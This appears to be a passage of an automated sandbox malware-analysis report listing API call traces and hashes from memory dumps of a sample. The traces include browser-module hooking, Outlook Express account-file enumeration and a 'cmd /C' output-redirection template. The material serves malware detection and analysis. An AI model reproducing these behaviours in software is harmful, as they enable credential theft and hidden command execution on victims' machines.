  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
